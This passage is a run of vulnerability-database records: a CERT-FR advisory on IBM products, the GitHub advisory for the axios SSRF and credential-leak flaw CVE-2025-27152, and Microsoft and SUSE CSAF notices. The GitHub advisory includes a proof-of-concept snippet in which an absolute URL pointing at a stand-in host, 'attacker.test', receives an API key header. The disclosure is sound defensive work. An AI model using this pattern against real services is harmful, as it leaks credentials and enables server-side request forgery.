"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-45641",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45641"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-33861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33861"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
}
],
"initial_release_date": "2025-05-23T00:00:00",
"last_revision_date": "2025-05-23T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0452",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-05-23T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-05-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234068",
"url": "https://www.ibm.com/support/pages/node/7234068"
},
{
"published_at": "2025-05-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233442",
"url": "https://www.ibm.com/support/pages/node/7233442"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233972",
"url": "https://www.ibm.com/support/pages/node/7233972"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234028",
"url": "https://www.ibm.com/support/pages/node/7234028"
}
]
}
ghsa-jr5f-v2jv-69x6
Vulnerability from github
Published
2025-03-07 15:16
Modified
2025-03-28 14:57
Severity ?
VLAI Severity ?
Summary
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
Details
Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Details
Consider the following code snippet:
```js import axios from "axios";
const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, });
// const userId = "123"; const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF ```
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
- When
baseURLis set, passing an absolute URL such ashttp://attacker.test/toget()should not ignorebaseURL. - Before sending the HTTP request (after combining the
baseURLwith the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL.
PoC
Follow the steps below to reproduce the issue:
- Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a script (e.g., main.js):
js
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
- Run the script:
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
Impact
- Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses
baseURLand does not validate path parameters is affected by this issue.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27152"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-07T15:16:00Z",
"nvd_published_at": "2025-03-07T16:15:38Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).\nReference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if \u2060`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" \u003e /tmp/server1/index.html \necho \"this is server2\" \u003e /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 \u0026\npython -m http.server -d /tmp/server2 10002 \u0026\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.",
"id": "GHSA-jr5f-v2jv-69x6",
"modified": "2025-03-28T14:57:51Z",
"published": "2025-03-07T15:16:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27152"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/issues/6463"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/6829"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.8.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL"
}
msrc_cve-2025-27152
Vulnerability from csaf_microsoft
Published
2025-03-02 00:00
Modified
2025-09-03 21:44
Summary
Possible SSRF and Credential Leakage via Absolute URL in axios Requests
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27152 Possible SSRF and Credential Leakage via Absolute URL in axios Requests - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-27152.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests",
"tracking": {
"current_release_date": "2025-09-03T21:44:02.000Z",
"generator": {
"date": "2025-10-20T03:02:47.307Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-27152",
"initial_release_date": "2025-03-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-03T21:44:02.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"category": "product_name",
"name": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "azl3 python-tensorboard 2.16.2-6",
"product_id": "1"
}
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-tensorboard 2.16.2-6 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27152",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"flags": [
{
"label": "component_not_present",
"product_ids": [
"17084-1"
]
}
],
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"known_not_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27152 Possible SSRF and Credential Leakage via Absolute URL in axios Requests - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-27152.json"
}
],
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests"
}
]
}
suse-su-2025:01326-1
Vulnerability from csaf_suse
Published
2025-08-14 13:03
Modified
2025-08-14 13:03
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_01326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:01326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202501326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:01326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041215.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-08-14T13:03:13Z",
"generator": {
"date": "2025-08-14T13:03:13Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:01326-1",
"initial_release_date": "2025-08-14T13:03:13Z",
"revision_history": [
{
"date": "2025-08-14T13:03:13Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
suse-su-2025:1227-1
Vulnerability from csaf_suse
Published
2025-04-14 07:06
Modified
2025-04-14 07:06
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
Patchnames
SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1227-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1227-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251227-1/"
},
{
"category": "self",
